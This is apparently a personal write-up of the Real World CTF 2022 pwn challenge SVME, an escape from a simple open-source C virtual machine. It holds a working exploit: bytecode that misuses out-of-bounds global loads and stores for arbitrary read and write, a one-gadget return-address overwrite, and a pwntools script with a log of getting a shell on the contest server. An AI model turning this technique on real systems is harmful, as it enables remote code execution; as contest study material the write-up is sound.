RWCTF SVME Writeup

Published on Jan 22, 2022

I just find this note for RWCTF pwn challenge SVME. Its a simple but traditional pwn challenge, in my opinion.

I havent thought about to solve it until my leader talked to me to participant the RWCTF game. I havent checked the Dingtalk, and I did not know there exist an internal RWCTF but I registered the Real RWCTF game.

It’s not that easy for me. Despite some experience with pwn.college and got a blue belt here. (And I planed to write a review for that interesting site! however lost all my notes with a hardware failure.). It took me nearly half of the day, one night and half the after noon, and made me feel that I would never take part in a CTF for a feeling of tired.

Next is the notes:

SVME challenge

The real world github source code program

https://github.com/parrt/simple-virtual-machine-C/

runs on a remote machine with docker deployed file.

FROM ubuntu:20.04

ENV DEBIAN_FRONTEND noninteractive

RUN apt-get update &&\
    apt-get install -y --no-install-recommends gcc g++ cmake make wget unzip socat

WORKDIR /app/

RUN wget --no-check-certificate https://github.com/parrt/simple-virtual-machine-C/archive/refs/heads/master.zip -O svme.zip &&\
    unzip svme.zip
COPY ./main.c /app/simple-virtual-machine-C-master/src/vmtest.c
RUN  cd simple-virtual-machine-C-master &&\
    cmake . &&\
    make &&\
    mv ./simple_virtual_machine_C /app/svme &&\
    cd /app/ &&\
    rm -rf ./simple-virtual-machine-C-master

RUN useradd --no-create-home -u 1000 user
COPY flag /

CMD ["socat", "tcp-l:1337,reuseaddr,fork,su=user", "exec:/app/svme"]

Trials

so … every time a different memory map. it’s ok, every modern machine has ASRL.

reverland@reverland-RESCUER-R720-15IKBN:~/practice/tmp$ cat /proc/
Display all 386 possibilities? (y or n)
reverland@reverland-RESCUER-R720-15IKBN:~/practice/tmp$ cat /proc/672346/maps
55b2fa990000-55b2fa991000 r--p 00000000 00:5f 32265997                   /app/svme
55b2fa991000-55b2fa992000 r-xp 00001000 00:5f 32265997                   /app/svme
55b2fa992000-55b2fa993000 r--p 00002000 00:5f 32265997                   /app/svme
55b2fa993000-55b2fa994000 r--p 00002000 00:5f 32265997                   /app/svme
55b2fa994000-55b2fa995000 rw-p 00003000 00:5f 32265997                   /app/svme
7fe14dd0f000-7fe14dd34000 r--p 00000000 00:5f 18745099                   /usr/lib/x86_64-linux-gnu/libc-2.31.so
7fe14dd34000-7fe14deac000 r-xp 00025000 00:5f 18745099                   /usr/lib/x86_64-linux-gnu/libc-2.31.so
7fe14deac000-7fe14def6000 r--p 0019d000 00:5f 18745099                   /usr/lib/x86_64-linux-gnu/libc-2.31.so
7fe14def6000-7fe14def7000 ---p 001e7000 00:5f 18745099                   /usr/lib/x86_64-linux-gnu/libc-2.31.so
7fe14def7000-7fe14defa000 r--p 001e7000 00:5f 18745099                   /usr/lib/x86_64-linux-gnu/libc-2.31.so
7fe14defa000-7fe14defd000 rw-p 001ea000 00:5f 18745099                   /usr/lib/x86_64-linux-gnu/libc-2.31.so
7fe14defd000-7fe14df03000 rw-p 00000000 00:00 0
7fe14df06000-7fe14df07000 r--p 00000000 00:5f 18745077                   /usr/lib/x86_64-linux-gnu/ld-2.31.so
7fe14df07000-7fe14df2a000 r-xp 00001000 00:5f 18745077                   /usr/lib/x86_64-linux-gnu/ld-2.31.so
7fe14df2a000-7fe14df32000 r--p 00024000 00:5f 18745077                   /usr/lib/x86_64-linux-gnu/ld-2.31.so
7fe14df33000-7fe14df34000 r--p 0002c000 00:5f 18745077                   /usr/lib/x86_64-linux-gnu/ld-2.31.so
7fe14df34000-7fe14df35000 rw-p 0002d000 00:5f 18745077                   /usr/lib/x86_64-linux-gnu/ld-2.31.so
7fe14df35000-7fe14df36000 rw-p 00000000 00:00 0
7fff01b06000-7fff01b27000 rw-p 00000000 00:00 0                          [stack]
7fff01b77000-7fff01b7b000 r--p 00000000 00:00 0                          [vvar]
7fff01b7b000-7fff01b7d000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0                  [vsyscall]
reverland@reverland-RESCUER-R720-15IKBN:~/practice/tmp$ ps -aux|grep svme
reverla+  669372  0.0  0.3 831428 57056 pts/4    Sl+  20:50   0:00 docker run -p 1337:1337 svme
root      669446  0.0  0.0   7052  3624 ?        Ss   20:50   0:00 socat tcp-l:1337,reuseaddr,fork,su=user exec:/app/svme
reverla+  672364  0.0  0.0   7052   456 ?        S    22:25   0:00 socat tcp-l:1337,reuseaddr,fork,su=user exec:/app/svme
reverla+  672365  0.0  0.0   2364   524 ?        S    22:25   0:00 /app/svme
reverla+  672367  0.0  0.0  12124   676 pts/3    S+   22:25   0:00 grep --color=auto svme
reverland@reverland-RESCUER-R720-15IKBN:~/practice/tmp$ cat /proc/672365/maps
55d0cb53c000-55d0cb53d000 r--p 00000000 00:5f 32265997                   /app/svme
55d0cb53d000-55d0cb53e000 r-xp 00001000 00:5f 32265997                   /app/svme
55d0cb53e000-55d0cb53f000 r--p 00002000 00:5f 32265997                   /app/svme
55d0cb53f000-55d0cb540000 r--p 00002000 00:5f 32265997                   /app/svme
55d0cb540000-55d0cb541000 rw-p 00003000 00:5f 32265997                   /app/svme
7f723bde3000-7f723be08000 r--p 00000000 00:5f 18745099                   /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f723be08000-7f723bf80000 r-xp 00025000 00:5f 18745099                   /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f723bf80000-7f723bfca000 r--p 0019d000 00:5f 18745099                   /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f723bfca000-7f723bfcb000 ---p 001e7000 00:5f 18745099                   /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f723bfcb000-7f723bfce000 r--p 001e7000 00:5f 18745099                   /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f723bfce000-7f723bfd1000 rw-p 001ea000 00:5f 18745099                   /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f723bfd1000-7f723bfd7000 rw-p 00000000 00:00 0
7f723bfda000-7f723bfdb000 r--p 00000000 00:5f 18745077                   /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f723bfdb000-7f723bffe000 r-xp 00001000 00:5f 18745077                   /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f723bffe000-7f723c006000 r--p 00024000 00:5f 18745077                   /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f723c007000-7f723c008000 r--p 0002c000 00:5f 18745077                   /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f723c008000-7f723c009000 rw-p 0002d000 00:5f 18745077                   /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f723c009000-7f723c00a000 rw-p 00000000 00:00 0
7ffe6acaf000-7ffe6acd0000 rw-p 00000000 00:00 0                          [stack]
7ffe6ad9b000-7ffe6ad9f000 r--p 00000000 00:00 0                          [vvar]
7ffe6ad9f000-7ffe6ada1000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0                  [vsyscall]
reverland@reverland-RESCUER-R720-15IKBN:~/practice/tmp$

I found i can use gload and gstore to leak and write memory after vm.globals (b3a0)

however, the vm is at (92a0)

pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x555555559000
Size: 0x291

Allocated chunk | PREV_INUSE
Addr: 0x555555559290
Size: 0x2101

Allocated chunk | PREV_INUSE
Addr: 0x55555555b390
Size: 0x21

Allocated chunk | PREV_INUSE
Addr: 0x55555555b3b0
Size: 0x411

Top chunk | PREV_INUSE
Addr: 0x55555555b7c0
Size: 0x1e841

pwndbg> p vm
$20 = (VM *) 0x5555555592a0

arbitrary read/write, the global is not safe.

arbitrary execute, overwrite rsp

however, need shell in one roundtrip

one gadget to get shell

reverland@reverland-host:~/practice$ python3 exp.py
[+] Opening connection to 47.243.140.252 on port 1337: Done
[DEBUG] Sent 0x200 bytes:
    00000000  0b 00 00 00  c1 f7 ff ff  0b 00 00 00  c5 f7 ff ff  │····│····│····│····│
    00000010  0b 00 00 00  c0 f7 ff ff  09 00 00 00  28 00 00 00  │····│····│····│(···│
    00000020  02 00 00 00  0d 00 00 00  c4 f7 ff ff  02 00 00 00  │····│····│····│····│
    00000030  01 00 00 00  01 00 00 00  09 00 00 00  00 00 00 00  │····│····│····│····│
    00000040  09 00 00 00  00 00 00 00  0b 00 00 00  90 00 00 00  │····│····│····│····│
    00000050  09 00 00 00  b3 70 02 00  02 00 00 00  09 00 00 00  │····│·p··│····│····│
    00000060  81 6c 0e 00  01 00 00 00  0d 00 00 00  00 00 00 00  │·l··│····│····│····│
    00000070  0b 00 00 00  91 00 00 00  0d 00 00 00  01 00 00 00  │····│····│····│····│
    00000080  12 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  │····│····│····│····│
    00000090  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  │····│····│····│····│
    *
    00000200
[*] Switching to interactive mode
$ cat /flag
[DEBUG] Sent 0xa bytes:
    b'cat /flag\n'
[DEBUG] Received 0x47 bytes:
    b'rwctf{simple_vm_escape_helps_warming_up_your_real_world_hacking_skill}\n'
rwctf{simple_vm_escape_helps_warming_up_your_real_world_hacking_skill}
[*] Got EOF while reading in interactive

the c program to generate the payload

#include <stdio.h>
typedef enum {
NOOP    = 0,
IADD    = 1,   // int add
ISUB    = 2,
IMUL    = 3,
ILT     = 4,   // int less than
IEQ     = 5,   // int equal
BR      = 6,   // branch
BRT     = 7,   // branch if true
BRF     = 8,   // branch if true
ICONST  = 9,   // push constant integer
LOAD    = 10,  // load from local context
GLOAD   = 11,  // load from global memory
STORE   = 12,  // store in local context
GSTORE  = 13,  // store in global memory
PRINT   = 14,  // print stack top
POP     = 15,  // throw away top of stack
CALL    = 16,  // call function at address with nargs,nlocals
RET     = 17,  // return value from function
HALT    = 18
} VM_CODE;


int main() {
    int s[] = {
    // push code higher 4 bytes
    GLOAD, -(0x2100-4)/4,
    // push global higher 4 bytes
    GLOAD, -(0x2100/4)+5,
    // push code lower 4 bytes
    GLOAD, -0x2100/4,
    ICONST, 40,
    ISUB,
    // write lower 4 bytes of ret address into higher 4 bytes of global
    GSTORE, (-0x2100/4)+4,
    ISUB,
    IADD,
    IADD,
    // now globas become VM_EXEC's address
    //
    // ensure free not panic
    ICONST, 0,
    // ensure free not panic
    ICONST, 0,
    // back to begining of the stack
    // load libc_main_start+243 into stack
    GLOAD, 0x90,
    ICONST, 0x270b3,
    ISUB,
    ICONST, 0xe6c81,
    IADD,
    GSTORE, 0,

    GLOAD, 0x91,
    GSTORE, 1,

    HALT,
};
    for (int i=0;i<sizeof(s);i++)
        printf("%c", ((char *)s)[i]);
}

my last exploit

from pwn import *
import time
context.log_level = 'debug'

#p = gdb.debug("simple-virtual-machine-C/simple_virtual_machine_C")
#p = process("docker/svme-indocker")
p = remote("47.243.140.252", 1337)
#p = remote("localhost", 1337)
with open("tmp/input1", "rb") as f:
    s = f.read()
s += b'\x00' * (512-len(s))
p.send(s)
#time.sleep(10)
#p.send(b'\x00' * (512-len(s)))
p.interactive()

Last

many of the time I took is on io, not until I really deploy a local one to test every thing. IO is hard, even with pwntools.